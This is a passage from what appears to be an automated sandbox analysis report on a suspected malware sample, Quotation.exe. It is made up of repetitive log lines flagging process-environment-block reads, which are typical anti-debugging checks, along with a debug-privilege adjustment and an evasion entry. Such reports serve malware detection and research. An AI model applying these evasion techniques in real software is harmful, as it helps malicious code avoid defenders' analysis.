      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7F2D0 mov eax, dword ptr fs:[00000030h]3_2_33E7F2D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7F2D0 mov eax, dword ptr fs:[00000030h]3_2_33E7F2D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B2D3 mov eax, dword ptr fs:[00000030h]3_2_33E4B2D3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B2D3 mov eax, dword ptr fs:[00000030h]3_2_33E4B2D3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4B2D3 mov eax, dword ptr fs:[00000030h]3_2_33E4B2D3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602A0 mov eax, dword ptr fs:[00000030h]3_2_33E602A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602A0 mov eax, dword ptr fs:[00000030h]3_2_33E602A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A0 mov eax, dword ptr fs:[00000030h]3_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A0 mov eax, dword ptr fs:[00000030h]3_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A0 mov eax, dword ptr fs:[00000030h]3_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A0 mov eax, dword ptr fs:[00000030h]3_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov ecx, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE62A0 mov eax, dword ptr fs:[00000030h]3_2_33EE62A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE72A0 mov eax, dword ptr fs:[00000030h]3_2_33EE72A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE72A0 mov eax, dword ptr fs:[00000030h]3_2_33EE72A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED92BC mov eax, dword ptr fs:[00000030h]3_2_33ED92BC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED92BC mov eax, dword ptr fs:[00000030h]3_2_33ED92BC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED92BC mov ecx, dword ptr fs:[00000030h]3_2_33ED92BC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED92BC mov ecx, dword ptr fs:[00000030h]3_2_33ED92BC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F192A6 mov eax, dword ptr fs:[00000030h]3_2_33F192A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F192A6 mov eax, dword ptr fs:[00000030h]3_2_33F192A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F192A6 mov eax, dword ptr fs:[00000030h]3_2_33F192A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F192A6 mov eax, dword ptr fs:[00000030h]3_2_33F192A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8E284 mov eax, dword ptr fs:[00000030h]3_2_33E8E284
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8E284 mov eax, dword ptr fs:[00000030h]3_2_33E8E284
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED0283 mov eax, dword ptr fs:[00000030h]3_2_33ED0283
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED0283 mov eax, dword ptr fs:[00000030h]3_2_33ED0283
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED0283 mov eax, dword ptr fs:[00000030h]3_2_33ED0283
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F25283 mov eax, dword ptr fs:[00000030h]3_2_33F25283
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8329E mov eax, dword ptr fs:[00000030h]3_2_33E8329E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8329E mov eax, dword ptr fs:[00000030h]3_2_33E8329E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F00274 mov eax, dword ptr fs:[00000030h]3_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E54260 mov eax, dword ptr fs:[00000030h]3_2_33E54260
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E54260 mov eax, dword ptr fs:[00000030h]3_2_33E54260
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E54260 mov eax, dword ptr fs:[00000030h]3_2_33E54260
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4826B mov eax, dword ptr fs:[00000030h]3_2_33E4826B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E79274 mov eax, dword ptr fs:[00000030h]3_2_33E79274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E91270 mov eax, dword ptr fs:[00000030h]3_2_33E91270
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E91270 mov eax, dword ptr fs:[00000030h]3_2_33E91270
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1D26B mov eax, dword ptr fs:[00000030h]3_2_33F1D26B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1D26B mov eax, dword ptr fs:[00000030h]3_2_33F1D26B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49240 mov eax, dword ptr fs:[00000030h]3_2_33E49240
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49240 mov eax, dword ptr fs:[00000030h]3_2_33E49240
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8724D mov eax, dword ptr fs:[00000030h]3_2_33E8724D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0B256 mov eax, dword ptr fs:[00000030h]3_2_33F0B256
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0B256 mov eax, dword ptr fs:[00000030h]3_2_33F0B256
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED8243 mov eax, dword ptr fs:[00000030h]3_2_33ED8243
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED8243 mov ecx, dword ptr fs:[00000030h]3_2_33ED8243
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A250 mov eax, dword ptr fs:[00000030h]3_2_33E4A250
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E56259 mov eax, dword ptr fs:[00000030h]3_2_33E56259
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F25227 mov eax, dword ptr fs:[00000030h]3_2_33F25227
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4823B mov eax, dword ptr fs:[00000030h]3_2_33E4823B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E87208 mov eax, dword ptr fs:[00000030h]3_2_33E87208
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E87208 mov eax, dword ptr fs:[00000030h]3_2_33E87208
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E751EF mov eax, dword ptr fs:[00000030h]3_2_33E751EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E551ED mov eax, dword ptr fs:[00000030h]3_2_33E551ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E801F8 mov eax, dword ptr fs:[00000030h]3_2_33E801F8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EF71F9 mov esi, dword ptr fs:[00000030h]3_2_33EF71F9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F261E5 mov eax, dword ptr fs:[00000030h]3_2_33F261E5
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F161C3 mov eax, dword ptr fs:[00000030h]3_2_33F161C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F161C3 mov eax, dword ptr fs:[00000030h]3_2_33F161C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8D1D0 mov eax, dword ptr fs:[00000030h]3_2_33E8D1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8D1D0 mov ecx, dword ptr fs:[00000030h]3_2_33E8D1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F251CB mov eax, dword ptr fs:[00000030h]3_2_33F251CB
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov eax, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov eax, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov ecx, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov eax, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE1D0 mov eax, dword ptr fs:[00000030h]3_2_33ECE1D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F011A4 mov eax, dword ptr fs:[00000030h]3_2_33F011A4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F011A4 mov eax, dword ptr fs:[00000030h]3_2_33F011A4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F011A4 mov eax, dword ptr fs:[00000030h]3_2_33F011A4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F011A4 mov eax, dword ptr fs:[00000030h]3_2_33F011A4
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6B1B0 mov eax, dword ptr fs:[00000030h]3_2_33E6B1B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E90185 mov eax, dword ptr fs:[00000030h]3_2_33E90185
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED019F mov eax, dword ptr fs:[00000030h]3_2_33ED019F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED019F mov eax, dword ptr fs:[00000030h]3_2_33ED019F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED019F mov eax, dword ptr fs:[00000030h]3_2_33ED019F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED019F mov eax, dword ptr fs:[00000030h]3_2_33ED019F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A197 mov eax, dword ptr fs:[00000030h]3_2_33E4A197
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A197 mov eax, dword ptr fs:[00000030h]3_2_33E4A197
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4A197 mov eax, dword ptr fs:[00000030h]3_2_33E4A197
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0C188 mov eax, dword ptr fs:[00000030h]3_2_33F0C188
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0C188 mov eax, dword ptr fs:[00000030h]3_2_33F0C188
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA7190 mov eax, dword ptr fs:[00000030h]3_2_33EA7190
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]3_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4F172 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EE9179 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F25152 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EE4144 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EE4144 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E49148 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E56154 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4C156 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EE8158 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E57152 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E80124 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4B136 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E51131 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F10115 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EFA118 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EFA118 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E750E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E750E4 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4A0E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E580E9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED60E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4C0F0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E920F0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E670C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E670C0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F250D9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ECD0C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED20DE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E790DB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EE80A8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F160B8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F160B8 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4D08D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E5208A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E55096 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8909C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E7D090 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED106E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F25060 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E7C073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E61070 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E61070 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ECD070 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EF705E mov ebx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EF705E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E52050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E7B052 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED6050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4A020 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4C020 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F1903E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED4000 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E6E016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E5D7E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E727ED mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E547FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E5C7C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E557C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED07C3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EDF7AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F237B6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED97A9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E507AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E7D7B0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4F7BA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F0F78A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4B765 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E58770 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8674D mov esi, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8674D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E63740 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E50750 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED4755 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E92750 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F23749 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E53720 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E6F720 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8C720 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F2B73C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8273C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8273C mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E49730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F1972B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ECC730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E85734 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F0F72E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E5973A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E57703 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E55702 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8C700 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E50710 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8F71F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E80710 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F0D6F0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33EE36EE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E7D6E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E836EF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED06F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ECE6F2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E5B6C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E816CF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8A6C7 mov ebx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8A6C7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F0F6C7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F116CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4D6AA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8C6A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E476B2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E866B0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33ED368C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E54690 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E8A660 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E89660 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E82674 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33F1866E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E6C640 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E6E627 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Code function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Quotation.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\Quotation.exeNtClose: Indirect: 0x33C5A56C
